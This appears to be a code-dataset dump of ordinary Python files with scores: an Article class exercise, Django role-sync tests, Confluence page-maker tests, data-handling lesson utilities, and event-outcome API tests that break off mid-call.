for chunk_id in ready_chunk_ids:
pipeline_ids.append(_pipeline.remote(chunk_id, json_dir, fulltext))
total_papers += chunk_size
progress.set_description_str('{} papers in total | tar progress'.format(total_papers))
ray.wait(pipeline_ids, num_returns=len(pipeline_ids))
progress.update(1)
ray.shutdown() | 0.361503 | 0.163579 |
import datetime
import typing
class ArticleField:
"""The `ArticleField` class for the Advanced Requirements."""
def __init__(self, field_type: typing.Type[typing.Any]):
pass
class Article:
"""The `Article` class you need to write for the qualifier."""
def __init__(self, title: str, author: str, publication_date: datetime.datetime, content: str):
self.title = title
self.author = author
self.content = content
self.publication_date = publication_date
def __repr__(self):
return "<Article title=\"{}\" author='{}' publication_date='{}'>".format(self.title, self.author, self.publication_date.isoformat())
def __len__(self):
return len(self.content)
def short_introduction(self, n_characters):
new_content = self.content.replace('\n', ' ')
return new_content[:n_characters+1].rsplit(' ', 1)[0]
def most_common_words(self, n_words):
pure_content = self.content.translate({ord(character): " " for character in "!@#'$%^&*()[]{};:,./<>?\|`~-=_+"})
new_content = pure_content.lower().split()
uniques = []
for unique in new_content:
if unique not in uniques:
uniques.append(unique)
counts = []
for unique in uniques:
count = 0
for word in new_content:
if word == unique:
count += 1
counts.append(unique)
counts.append(count)
result = {counts[i]: counts[i + 1] for i in range(0, len(counts), 2)}
sorted_result = {key: value for key, value in sorted(result.items(), key=lambda item: item[1], reverse=True)[:n_words]}
return sorted_result
fairytale = Article(title="The emperor's new clothes",
author="<NAME>",
content="'But he has nothing at all on!' at last cried out all the people. The Emperor was vexed, for he knew that the people were right.",
publication_date=datetime.datetime(1837, 4, 7, 12, 15, 0))
print(fairytale.publication_date)
print(fairytale)
print(len(fairytale))
print(fairytale.short_introduction(n_characters=16))
print(fairytale.most_common_words(5)) | qualifier.py | import datetime
import typing
class ArticleField:
"""The `ArticleField` class for the Advanced Requirements."""
def __init__(self, field_type: typing.Type[typing.Any]):
pass
class Article:
"""The `Article` class you need to write for the qualifier."""
def __init__(self, title: str, author: str, publication_date: datetime.datetime, content: str):
self.title = title
self.author = author
self.content = content
self.publication_date = publication_date
def __repr__(self):
return "<Article title=\"{}\" author='{}' publication_date='{}'>".format(self.title, self.author, self.publication_date.isoformat())
def __len__(self):
return len(self.content)
def short_introduction(self, n_characters):
new_content = self.content.replace('\n', ' ')
return new_content[:n_characters+1].rsplit(' ', 1)[0]
def most_common_words(self, n_words):
pure_content = self.content.translate({ord(character): " " for character in "!@#'$%^&*()[]{};:,./<>?\|`~-=_+"})
new_content = pure_content.lower().split()
uniques = []
for unique in new_content:
if unique not in uniques:
uniques.append(unique)
counts = []
for unique in uniques:
count = 0
for word in new_content:
if word == unique:
count += 1
counts.append(unique)
counts.append(count)
result = {counts[i]: counts[i + 1] for i in range(0, len(counts), 2)}
sorted_result = {key: value for key, value in sorted(result.items(), key=lambda item: item[1], reverse=True)[:n_words]}
return sorted_result
fairytale = Article(title="The emperor's new clothes",
author="<NAME>",
content="'But he has nothing at all on!' at last cried out all the people. The Emperor was vexed, for he knew that the people were right.",
publication_date=datetime.datetime(1837, 4, 7, 12, 15, 0))
print(fairytale.publication_date)
print(fairytale)
print(len(fairytale))
print(fairytale.short_introduction(n_characters=16))
print(fairytale.most_common_words(5)) | 0.777638 | 0.259518 |
import uuid
from django.test import TestCase
from unittest.mock import patch
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.linked_domain.models import DomainLink
from corehq.apps.linked_domain.tests.test_linked_apps import BaseLinkedDomainTest
from corehq.apps.linked_domain.updates import update_user_roles
from corehq.apps.linked_domain.util import _clean_json
from corehq.apps.userreports.util import get_ucr_class_name
from corehq.apps.users.models import Permissions, UserRole
class TestUpdateRoles(BaseLinkedDomainTest):
@classmethod
def setUpClass(cls):
super(TestUpdateRoles, cls).setUpClass()
permissions = Permissions(
edit_data=True,
edit_reports=True,
view_report_list=[
'corehq.reports.DynamicReportmaster_report_id'
]
)
cls.role = UserRole.create(cls.domain, 'test', permissions, is_non_admin_editable=True)
cls.other_role = UserRole.create(
cls.domain, 'other_test', Permissions(edit_web_users=True, view_locations=True)
)
cls.other_role.set_assignable_by([cls.role.id])
@classmethod
def tearDownClass(cls):
cls.role.delete()
cls.other_role.delete()
super(TestUpdateRoles, cls).tearDownClass()
def tearDown(self):
for role in UserRole.objects.get_by_domain(self.linked_domain):
role.delete()
super(TestUpdateRoles, self).tearDown()
def test_update_report_list(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
report_mapping = {'master_report_id': 'linked_report_id'}
with patch('corehq.apps.linked_domain.updates.get_static_report_mapping', return_value=report_mapping):
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles))
self.assertEqual(roles['test'].permissions.view_report_list, [get_ucr_class_name('linked_report_id')])
self.assertTrue(roles['test'].is_non_admin_editable)
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].assignable_by, [roles['test'].get_id])
def test_match_names(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
# create role in linked domain with the same name but no 'upstream_id'
UserRole.create(
self.linked_domain, 'other_test', Permissions(edit_web_users=True, view_locations=True)
)
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles))
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].upstream_id, self.other_role.get_id)
def test_match_ids(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
# create role in linked domain with upstream_id and name not matching upstream name
UserRole.create(
self.linked_domain, 'id_test', Permissions(edit_web_users=False, view_locations=True),
upstream_id=self.other_role.get_id
)
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles), roles.keys())
self.assertIsNotNone(roles.get('other_test'))
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].upstream_id, self.other_role.get_id)
class TestUpdateRolesRemote(TestCase):
role_json_template = {
"name": None,
"permissions": None,
"default_landing_page": None,
"is_non_admin_editable": False,
"assignable_by": [],
"is_archived": False,
"upstream_id": None
}
@classmethod
def setUpClass(cls):
super(TestUpdateRolesRemote, cls).setUpClass()
cls.domain_obj = create_domain('domain')
cls.domain = cls.domain_obj.name
cls.linked_domain_obj = create_domain('domain-2')
cls.linked_domain = cls.linked_domain_obj.name
cls.domain_link = DomainLink.link_domains(cls.linked_domain, cls.domain)
cls.domain_link.remote_base_url = "http://other.org"
cls.domain_link.save()
@classmethod
def tearDownClass(cls):
cls.domain_link.delete()
cls.domain_obj.delete()
cls.linked_domain_obj.delete()
super(TestUpdateRolesRemote, cls).tearDownClass()
def setUp(self):
self.upstream_role1_id = uuid.uuid4().hex
self.role1 = UserRole.create(
domain=self.linked_domain,
name='test',
permissions=Permissions(
edit_data=True,
edit_reports=True,
view_report_list=[
'corehq.reports.DynamicReportmaster_report_id'
]
),
is_non_admin_editable=True,
upstream_id=self.upstream_role1_id
)
self.other_role = UserRole.create(
domain=self.linked_domain,
name='other_test',
permissions=Permissions(
edit_web_users=True,
view_locations=True,
),
assignable_by=[self.role1.id],
)
self.other_role.save()
def tearDown(self):
for role in UserRole.objects.get_by_domain(self.linked_domain):
role.delete()
super(TestUpdateRolesRemote, self).tearDown()
@patch('corehq.apps.linked_domain.updates.remote_get_user_roles')
def test_update_remote(self, remote_get_user_roles):
remote_permissions = Permissions(
edit_data=False,
edit_reports=True,
view_report_list=['corehq.reports.static_report']
)
# sync with existing local role
remote_role1 = self._make_remote_role_json(
_id=self.upstream_role1_id,
name="test",
permissions=remote_permissions.to_json(),
)
# create new role
remote_role_other = self._make_remote_role_json(
_id=uuid.uuid4().hex,
name="another",
permissions=Permissions().to_json(),
assignable_by=[self.upstream_role1_id]
)
remote_get_user_roles.return_value = [
_clean_json(role) for role in [remote_role1, remote_role_other]
]
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(3, len(roles))
self.assertEqual(roles['test'].permissions, remote_permissions)
self.assertEqual(roles['test'].is_non_admin_editable, False)
self.assertEqual(roles['another'].assignable_by, [self.role1.get_id])
self.assertEqual(roles['another'].permissions, Permissions())
self.assertEqual(roles['other_test'].assignable_by, [self.role1.get_id])
def _make_remote_role_json(self, **kwargs):
role_json = self.role_json_template.copy()
role_json.update(**kwargs)
return role_json | corehq/apps/linked_domain/tests/test_update_roles.py | import uuid
from django.test import TestCase
from unittest.mock import patch
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.linked_domain.models import DomainLink
from corehq.apps.linked_domain.tests.test_linked_apps import BaseLinkedDomainTest
from corehq.apps.linked_domain.updates import update_user_roles
from corehq.apps.linked_domain.util import _clean_json
from corehq.apps.userreports.util import get_ucr_class_name
from corehq.apps.users.models import Permissions, UserRole
class TestUpdateRoles(BaseLinkedDomainTest):
@classmethod
def setUpClass(cls):
super(TestUpdateRoles, cls).setUpClass()
permissions = Permissions(
edit_data=True,
edit_reports=True,
view_report_list=[
'corehq.reports.DynamicReportmaster_report_id'
]
)
cls.role = UserRole.create(cls.domain, 'test', permissions, is_non_admin_editable=True)
cls.other_role = UserRole.create(
cls.domain, 'other_test', Permissions(edit_web_users=True, view_locations=True)
)
cls.other_role.set_assignable_by([cls.role.id])
@classmethod
def tearDownClass(cls):
cls.role.delete()
cls.other_role.delete()
super(TestUpdateRoles, cls).tearDownClass()
def tearDown(self):
for role in UserRole.objects.get_by_domain(self.linked_domain):
role.delete()
super(TestUpdateRoles, self).tearDown()
def test_update_report_list(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
report_mapping = {'master_report_id': 'linked_report_id'}
with patch('corehq.apps.linked_domain.updates.get_static_report_mapping', return_value=report_mapping):
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles))
self.assertEqual(roles['test'].permissions.view_report_list, [get_ucr_class_name('linked_report_id')])
self.assertTrue(roles['test'].is_non_admin_editable)
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].assignable_by, [roles['test'].get_id])
def test_match_names(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
# create role in linked domain with the same name but no 'upstream_id'
UserRole.create(
self.linked_domain, 'other_test', Permissions(edit_web_users=True, view_locations=True)
)
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles))
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].upstream_id, self.other_role.get_id)
def test_match_ids(self):
self.assertEqual([], UserRole.objects.get_by_domain(self.linked_domain))
# create role in linked domain with upstream_id and name not matching upstream name
UserRole.create(
self.linked_domain, 'id_test', Permissions(edit_web_users=False, view_locations=True),
upstream_id=self.other_role.get_id
)
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(2, len(roles), roles.keys())
self.assertIsNotNone(roles.get('other_test'))
self.assertTrue(roles['other_test'].permissions.edit_web_users)
self.assertEqual(roles['other_test'].upstream_id, self.other_role.get_id)
class TestUpdateRolesRemote(TestCase):
role_json_template = {
"name": None,
"permissions": None,
"default_landing_page": None,
"is_non_admin_editable": False,
"assignable_by": [],
"is_archived": False,
"upstream_id": None
}
@classmethod
def setUpClass(cls):
super(TestUpdateRolesRemote, cls).setUpClass()
cls.domain_obj = create_domain('domain')
cls.domain = cls.domain_obj.name
cls.linked_domain_obj = create_domain('domain-2')
cls.linked_domain = cls.linked_domain_obj.name
cls.domain_link = DomainLink.link_domains(cls.linked_domain, cls.domain)
cls.domain_link.remote_base_url = "http://other.org"
cls.domain_link.save()
@classmethod
def tearDownClass(cls):
cls.domain_link.delete()
cls.domain_obj.delete()
cls.linked_domain_obj.delete()
super(TestUpdateRolesRemote, cls).tearDownClass()
def setUp(self):
self.upstream_role1_id = uuid.uuid4().hex
self.role1 = UserRole.create(
domain=self.linked_domain,
name='test',
permissions=Permissions(
edit_data=True,
edit_reports=True,
view_report_list=[
'corehq.reports.DynamicReportmaster_report_id'
]
),
is_non_admin_editable=True,
upstream_id=self.upstream_role1_id
)
self.other_role = UserRole.create(
domain=self.linked_domain,
name='other_test',
permissions=Permissions(
edit_web_users=True,
view_locations=True,
),
assignable_by=[self.role1.id],
)
self.other_role.save()
def tearDown(self):
for role in UserRole.objects.get_by_domain(self.linked_domain):
role.delete()
super(TestUpdateRolesRemote, self).tearDown()
@patch('corehq.apps.linked_domain.updates.remote_get_user_roles')
def test_update_remote(self, remote_get_user_roles):
remote_permissions = Permissions(
edit_data=False,
edit_reports=True,
view_report_list=['corehq.reports.static_report']
)
# sync with existing local role
remote_role1 = self._make_remote_role_json(
_id=self.upstream_role1_id,
name="test",
permissions=remote_permissions.to_json(),
)
# create new role
remote_role_other = self._make_remote_role_json(
_id=uuid.uuid4().hex,
name="another",
permissions=Permissions().to_json(),
assignable_by=[self.upstream_role1_id]
)
remote_get_user_roles.return_value = [
_clean_json(role) for role in [remote_role1, remote_role_other]
]
update_user_roles(self.domain_link)
roles = {r.name: r for r in UserRole.objects.get_by_domain(self.linked_domain)}
self.assertEqual(3, len(roles))
self.assertEqual(roles['test'].permissions, remote_permissions)
self.assertEqual(roles['test'].is_non_admin_editable, False)
self.assertEqual(roles['another'].assignable_by, [self.role1.get_id])
self.assertEqual(roles['another'].permissions, Permissions())
self.assertEqual(roles['other_test'].assignable_by, [self.role1.get_id])
def _make_remote_role_json(self, **kwargs):
role_json = self.role_json_template.copy()
role_json.update(**kwargs)
return role_json | 0.556882 | 0.304352 |
from unittest import TestCase
import os
from conf_publisher.page_maker import make_page, make_pages
from conf_publisher.confluence import Page
from conf_publisher.config import ConfigLoader, ConfigDumper
class FakeConfluencePageManager(object):
def __init__(self, initial_pages=None):
if initial_pages is None:
initial_pages = []
self._pages = dict((page.id, page) for page in initial_pages)
def _get_last_content_id(self):
if len(self._pages.keys()):
return max(self._pages.keys())
return 0
def load(self, content_id):
return self._pages[content_id]
def create(self, page):
content_id = self._get_last_content_id() + 1
self._pages[content_id] = page
return content_id
def update(self, page, bump_version=True):
if bump_version:
page.version_number += 1
self._pages[page.id] = page
return page.id
def make_page_fixture(page_id=None, title=None, body=None, space_key='TEST'):
p = Page()
p.id = page_id
p.space_key = space_key
p.title = title
p.body = body
return p
class PageMakerTestCase(TestCase):
def test_make_page(self):
parent_page = make_page_fixture(page_id=40000000, title='parent page')
page_manager = FakeConfluencePageManager([parent_page])
page_id = make_page(parent_page, 'child page', page_manager)
self.assertEqual(page_id, 40000001)
def test_make_pages_with_parent_id(self):
page_manager = FakeConfluencePageManager([
make_page_fixture(page_id=40000000, title='parent page')
])
config = ConfigLoader.from_dict({
'version': 2,
'base_dir': 'fixtures',
'pages': [
{
'title': 'child page',
}
]
})
make_pages(config, page_manager, parent_id=40000000)
self.assertTrue(40000001 in page_manager._pages)
def test_make_pages_without_parent_id(self):
page_manager = FakeConfluencePageManager([
make_page_fixture(page_id=40000000, title='parent page')
])
config = ConfigLoader.from_dict({
'version': 2,
'base_dir': 'fixtures',
'pages': [
{
'id': 40000000,
'title': 'parent page',
'pages': [
{
'title': 'child page',
}
]
}
]
})
make_pages(config, page_manager, parent_id=40000000)
self.assertTrue(40000001 in page_manager._pages)
def test_dump_config(self):
expected = [
'version: 2\n',
'base_dir: fixtures\n',
'pages:\n',
'- id: 40000000\n',
' title: parent page\n',
' pages:\n',
' - title: child page\n'
]
config = ConfigLoader.from_dict({
'version': 2,
'base_dir': 'fixtures',
'pages': [
{
'id': 40000000,
'title': 'parent page',
'pages': [
{
'title': 'child page',
}
]
}
]
})
ConfigDumper.to_yaml_file(config, 'test_cfg.yaml')
with open('test_cfg.yaml') as cfg:
data = cfg.readlines()
os.remove('test_cfg.yaml')
self.assertEqual(expected, data) | tests/test_page_maker.py | from unittest import TestCase
import os
from conf_publisher.page_maker import make_page, make_pages
from conf_publisher.confluence import Page
from conf_publisher.config import ConfigLoader, ConfigDumper
class FakeConfluencePageManager(object):
def __init__(self, initial_pages=None):
if initial_pages is None:
initial_pages = []
self._pages = dict((page.id, page) for page in initial_pages)
def _get_last_content_id(self):
if len(self._pages.keys()):
return max(self._pages.keys())
return 0
def load(self, content_id):
return self._pages[content_id]
def create(self, page):
content_id = self._get_last_content_id() + 1
self._pages[content_id] = page
return content_id
def update(self, page, bump_version=True):
if bump_version:
page.version_number += 1
self._pages[page.id] = page
return page.id
def make_page_fixture(page_id=None, title=None, body=None, space_key='TEST'):
p = Page()
p.id = page_id
p.space_key = space_key
p.title = title
p.body = body
return p
class PageMakerTestCase(TestCase):
def test_make_page(self):
parent_page = make_page_fixture(page_id=40000000, title='parent page')
page_manager = FakeConfluencePageManager([parent_page])
page_id = make_page(parent_page, 'child page', page_manager)
self.assertEqual(page_id, 40000001)
def test_make_pages_with_parent_id(self):
page_manager = FakeConfluencePageManager([
make_page_fixture(page_id=40000000, title='parent page')
])
config = ConfigLoader.from_dict({
'version': 2,
'base_dir': 'fixtures',
'pages': [
{
'title': 'child page',
}
]
})
make_pages(config, page_manager, parent_id=40000000)
self.assertTrue(40000001 in page_manager._pages)
def test_make_pages_without_parent_id(self):
page_manager = FakeConfluencePageManager([
make_page_fixture(page_id=40000000, title='parent page')
])
config = ConfigLoader.from_dict({
'version': 2,
'base_dir': 'fixtures',
'pages': [
{
'id': 40000000,
'title': 'parent page',
'pages': [
{
'title': 'child page',
}
]
}
]
})
make_pages(config, page_manager, parent_id=40000000)
self.assertTrue(40000001 in page_manager._pages)
def test_dump_config(self):
expected = [
'version: 2\n',
'base_dir: fixtures\n',
'pages:\n',
'- id: 40000000\n',
' title: parent page\n',
' pages:\n',
' - title: child page\n'
]
config = ConfigLoader.from_dict({
'version': 2,
'base_dir': 'fixtures',
'pages': [
{
'id': 40000000,
'title': 'parent page',
'pages': [
{
'title': 'child page',
}
]
}
]
})
ConfigDumper.to_yaml_file(config, 'test_cfg.yaml')
with open('test_cfg.yaml') as cfg:
data = cfg.readlines()
os.remove('test_cfg.yaml')
self.assertEqual(expected, data) | 0.536313 | 0.192672 |
__all__ = ['A', 'B', 'Transform', 'compose', 'ItemList', 'ResizeTransform', 'ImageItemList', 'group_by', 'Matcher',
'map_group', 'SplitData']
# Cell
from solutions.lesson1 import *
from solutions.lesson2 import *
from solutions.lesson3 import *
from typing import List, Sequence, TypeVar, Generic, Callable, Tuple, Union, Optional, Set
from types import GeneratorType
from PIL import Image
import requests
import tempfile
from io import BytesIO
from pathlib import Path
import mimetypes
from collections import OrderedDict
# Cell
A = TypeVar('A')
B = TypeVar('B')
# Cell
class Transform(Generic[A,B]):
_order = 0
def __call__(self, x: A) -> B:
raise NotImplementedError
# Cell
def compose(x: A, fs: Sequence[Callable[[A], A]]) -> A:
sortd = sorted(fs, key=lambda x: getattr(x, '_order', 0))
for f in sortd: x = f(x)
return x
# Cell
class ItemList(ListContainer, Generic[A]):
def __init__(self, items: List[A]):
self.items = items
def get(self, idx: int) -> A:
return self.items[idx]
def _get(self, idx, tfms: Union[Callable[[A], A], Sequence[Callable[[A],A]]]) -> A:
if isinstance(tfms, (GeneratorType, set)):
tfms = list(tfms)
elif callable(tfms):
tfms = [tfms]
x = self.get(idx)
return compose(x, tfms)
def __repr__(self): return "{}:\n{} items\n{}".format(self.__class__.__name__, self.__len__(), super().__repr__())
# Cell
class ResizeTransform(Transform[Image.Image, Image.Image]):
def __init__(self, px: Tuple[int, int]):
self.px = px
def __call__(self, img: Image):
return img.resize(self.px)
# Cell
class ImageItemList(ItemList):
def get(self, idx: int) -> Image:
return Image.open(self.items[idx])
@classmethod
def from_files(cls, path: Union[Path, str], extensions=None, recurse=True):
path = Path(path)
return ImageItemList(get_files(path, extensions=extensions, recurse=recurse))
# Cell
def group_by(l: List[A], *preds: Predicate[A]):
if len(preds) == 0:
return []
t = []
f = []
f_a, f_bs = preds[0], preds[1:]
for elem in l:
if f_a(elem):
t.append(elem)
else:
f.append(elem)
return [t, *group_by(f, *f_bs)]
# Cell
class Matcher(Generic[A]):
"""
Initialized with a value `value` and optionally a function `f`.
Tests equality of new values with `value`, optionally applying
a transformation function `f` to the new values first.
"""
def __init__(self, value: A, f: Optional[Callable[[A], A]] = None):
self.value = value
self.f = f or identity
def __call__(self, other: A) -> bool:
return self.value == self.f(other)
def map_group(l: List[A], vals: List[B], f: Callable[[A], B] = None) -> List[List[A]]:
if f is None: f = identity
return group_by(l, *[Matcher(v, f) for v in vals])
# Cell
class SplitData(Generic[A]):
def __init__(self, train: ItemList[A], valid: ItemList[A], test: Optional[ItemList[A]] = None):
self.train = train
self.valid = valid
self.test = test or ItemList([])
def __repr__(self):
main = "SplitData\nTrain:\n{}\n\nValid:\n{}".format(self.train, self.valid)
if len(self.test) > 0:
return main + "\n\nTest:\n{}".format(self.test)
return main
@classmethod
def split_by_fn(cls, il: ItemList[A], f: Callable[[A], str], train_val='train', valid_val='valid', test_val='test'):
il_cls = il.__class__
train_f = lambda x: f(x) == train_val
valid_f = lambda x: f(x) == valid_val
test_f = lambda x: f(x) == test_val
train, valid, test = group_by(il, train_f, valid_f, test_f)
return cls(il_cls(train), il_cls(valid), il_cls(test)) | solutions/solutions/lesson4.py |
__all__ = ['A', 'B', 'Transform', 'compose', 'ItemList', 'ResizeTransform', 'ImageItemList', 'group_by', 'Matcher',
'map_group', 'SplitData']
# Cell
from solutions.lesson1 import *
from solutions.lesson2 import *
from solutions.lesson3 import *
from typing import List, Sequence, TypeVar, Generic, Callable, Tuple, Union, Optional, Set
from types import GeneratorType
from PIL import Image
import requests
import tempfile
from io import BytesIO
from pathlib import Path
import mimetypes
from collections import OrderedDict
# Cell
A = TypeVar('A')
B = TypeVar('B')
# Cell
class Transform(Generic[A,B]):
_order = 0
def __call__(self, x: A) -> B:
raise NotImplementedError
# Cell
def compose(x: A, fs: Sequence[Callable[[A], A]]) -> A:
sortd = sorted(fs, key=lambda x: getattr(x, '_order', 0))
for f in sortd: x = f(x)
return x
# Cell
class ItemList(ListContainer, Generic[A]):
def __init__(self, items: List[A]):
self.items = items
def get(self, idx: int) -> A:
return self.items[idx]
def _get(self, idx, tfms: Union[Callable[[A], A], Sequence[Callable[[A],A]]]) -> A:
if isinstance(tfms, (GeneratorType, set)):
tfms = list(tfms)
elif callable(tfms):
tfms = [tfms]
x = self.get(idx)
return compose(x, tfms)
def __repr__(self): return "{}:\n{} items\n{}".format(self.__class__.__name__, self.__len__(), super().__repr__())
# Cell
class ResizeTransform(Transform[Image.Image, Image.Image]):
def __init__(self, px: Tuple[int, int]):
self.px = px
def __call__(self, img: Image):
return img.resize(self.px)
# Cell
class ImageItemList(ItemList):
def get(self, idx: int) -> Image:
return Image.open(self.items[idx])
@classmethod
def from_files(cls, path: Union[Path, str], extensions=None, recurse=True):
path = Path(path)
return ImageItemList(get_files(path, extensions=extensions, recurse=recurse))
# Cell
def group_by(l: List[A], *preds: Predicate[A]):
if len(preds) == 0:
return []
t = []
f = []
f_a, f_bs = preds[0], preds[1:]
for elem in l:
if f_a(elem):
t.append(elem)
else:
f.append(elem)
return [t, *group_by(f, *f_bs)]
# Cell
class Matcher(Generic[A]):
"""
Initialized with a value `value` and optionally a function `f`.
Tests equality of new values with `value`, optionally applying
a transformation function `f` to the new values first.
"""
def __init__(self, value: A, f: Optional[Callable[[A], A]] = None):
self.value = value
self.f = f or identity
def __call__(self, other: A) -> bool:
return self.value == self.f(other)
def map_group(l: List[A], vals: List[B], f: Callable[[A], B] = None) -> List[List[A]]:
if f is None: f = identity
return group_by(l, *[Matcher(v, f) for v in vals])
# Cell
class SplitData(Generic[A]):
def __init__(self, train: ItemList[A], valid: ItemList[A], test: Optional[ItemList[A]] = None):
self.train = train
self.valid = valid
self.test = test or ItemList([])
def __repr__(self):
main = "SplitData\nTrain:\n{}\n\nValid:\n{}".format(self.train, self.valid)
if len(self.test) > 0:
return main + "\n\nTest:\n{}".format(self.test)
return main
@classmethod
def split_by_fn(cls, il: ItemList[A], f: Callable[[A], str], train_val='train', valid_val='valid', test_val='test'):
il_cls = il.__class__
train_f = lambda x: f(x) == train_val
valid_f = lambda x: f(x) == valid_val
test_f = lambda x: f(x) == test_val
train, valid, test = group_by(il, train_f, valid_f, test_f)
return cls(il_cls(train), il_cls(valid), il_cls(test)) | 0.89154 | 0.461502 |
import json
from datetime import datetime, timedelta
from app import db, LOGGER
from app.utils.testing import ApiTestCase
from app.outcome.models import Outcome, Status
from app.outcome.repository import OutcomeRepository as outcome_repository
class OutcomeApiTest(ApiTestCase):
def seed_static_data(self):
db.session.expire_on_commit = False
self.event1 = self.add_event(name={'en': 'Event 1'}, key='event1')
self.event2 = self.add_event(name={'en': 'Event 2'}, key='event2')
self.test_user1 = self.add_user('<EMAIL>')
self.test_user2 = self.add_user('<EMAIL>')
self.event1_admin = self.add_user('<EMAIL>')
self.event2_admin = self.add_user('<EMAIL>')
self.event1.add_event_role('admin', self.event1_admin.id)
self.event2.add_event_role('admin', self.event2_admin.id)
# Add 2 outcomes for event 1 to user 1
self.event1_user1_outcome1 = Outcome(self.event1.id, self.test_user1.id, 'WAITLIST', self.event1_admin.id)
self.event1_user1_outcome1.reset_latest()
self.event1_user1_outcome2 = Outcome(self.event1.id, self.test_user1.id, 'ACCEPTED', self.event1_admin.id)
# Add 1 outcome for event 1 to user 2
self.event1_user2_outcome = Outcome(self.event1.id, self.test_user2.id, 'REJECTED', self.event1_admin.id)
# Add 1 outcome for event 2 to user 1
self.event2_user1_outcome = Outcome(self.event2.id, self.test_user1.id, 'WAITLIST', self.event2_admin.id)
db.session.add_all([
self.event1_user1_outcome1,
self.event1_user1_outcome2,
self.event1_user2_outcome,
self.event2_user1_outcome
])
db.session.commit()
self.add_email_template('outcome-rejected')
self.add_email_template('outcome-waitlist')
db.session.flush()
self.event1_user1_outcome1_id = self.event1_user1_outcome1.id
self.event1_user1_outcome2_id = self.event1_user1_outcome2.id
self.event1_user2_outcome_id = self.event1_user2_outcome.id
self.event2_user1_outcome_id = self.event2_user1_outcome.id
self.test_user1_id = self.test_user1.id
def test_repository_get_latest_by_user_for_event(self):
"""Test that repository method gets the correct latest outcome for a user."""
self.seed_static_data()
result = outcome_repository.get_latest_by_user_for_event(self.test_user1.id, self.event1.id)
self.assertEqual(result.id, self.event1_user1_outcome2.id)
self.assertEqual(result.status, Status.ACCEPTED)
result = outcome_repository.get_latest_by_user_for_event(self.test_user2.id, self.event1.id)
self.assertEqual(result.id, self.event1_user2_outcome.id)
self.assertEqual(result.status, Status.REJECTED)
def test_get_all_by_user_for_event(self):
"""Test that repository method gets all outcomes for a user."""
self.seed_static_data()
result = outcome_repository.get_all_by_user_for_event(self.test_user1.id, self.event1.id)
self.assertEqual(len(result), 2)
self.assertItemsEqual([o.id for o in result], [self.event1_user1_outcome1.id, self.event1_user1_outcome2.id])
def test_get_latest_for_event(self):
"""Test that repository method gets the latest outcomes for an event."""
self.seed_static_data()
result = outcome_repository.get_latest_for_event(self.event1.id)
self.assertEqual(len(result), 2)
self.assertItemsEqual([o.id for o in result], [self.event1_user1_outcome2.id, self.event1_user2_outcome.id])
def test_outcome_get(self):
"""Test usual get case."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome',
data={'event_id': self.event1.id},
headers=self.get_auth_header_for('<EMAIL>'))
data = json.loads(response.data)
self.assertEqual(response.status_code, 200)
self.assertEqual(data['id'], self.event1_user1_outcome2_id)
self.assertEqual(data['status'], 'ACCEPTED')
self.assertEqual(data['timestamp'], self.event1_user1_outcome2.timestamp.isoformat())
def test_get_with_no_outcome(self):
"""Test get method when there is no outcome."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome',
data={'event_id': self.event2.id},
headers=self.get_auth_header_for('<EMAIL>'))
self.assertEqual(response.status_code, 404)
def test_outcome_post_non_event_admin(self):
"""Test that a forbidden status is given when the logged in user is not an event admin."""
self.seed_static_data()
response = self.app.post(
'/api/v1/outcome',
data={
'event_id': self.event1.id,
'user_id': self.test_user1.id,
'outcome': 'ACCEPTED'
},
headers=self.get_auth_header_for('<EMAIL>'))
data = json.loads(response.data)
self.assertEqual(response.status_code, 403)
def test_post(self):
"""Test typical post flow."""
self.seed_static_data()
response = self.app.post(
'/api/v1/outcome',
data={
'event_id': self.event2.id,
'user_id': self.test_user1.id,
'outcome': 'REJECTED'
},
headers=self.get_auth_header_for('<EMAIL>'))
data = json.loads(response.data)
self.assertEqual(response.status_code, 201)
outcomes = outcome_repository.get_all_by_user_for_event(self.test_user1_id, self.event2.id)
outcomes = list(sorted(outcomes, key=lambda o: o.timestamp))
print(outcomes)
self.assertEqual(outcomes[0].status, Status.WAITLIST)
self.assertFalse(outcomes[0].latest)
self.assertEqual(outcomes[1].status, Status.REJECTED)
self.assertTrue(outcomes[1].latest)
def test_outcome_list_get_event_admin(self):
"""Test that outcome list get can only be performed by an event admin."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome-list',
data={'event_id': self.event1.id},
headers=self.get_auth_header_for('<EMAIL>'))
self.assertEqual(response.status_code, 403)
def test_outcome_list_get_correct_event_admin(self):
"""Test that outcome list get can only be performed by the correct event admin."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome-list',
data={'event_id': self.event1.id},
headers=self.get_auth_header_for('<EMAIL>'))
self.assertEqual(response.status_code, 403)
def test_outcome_list_get(self):
"""Test getting all outcomes for an event."""
self.seed_static_data()
response = self.app.get(
'/api/v1/outcome-list',
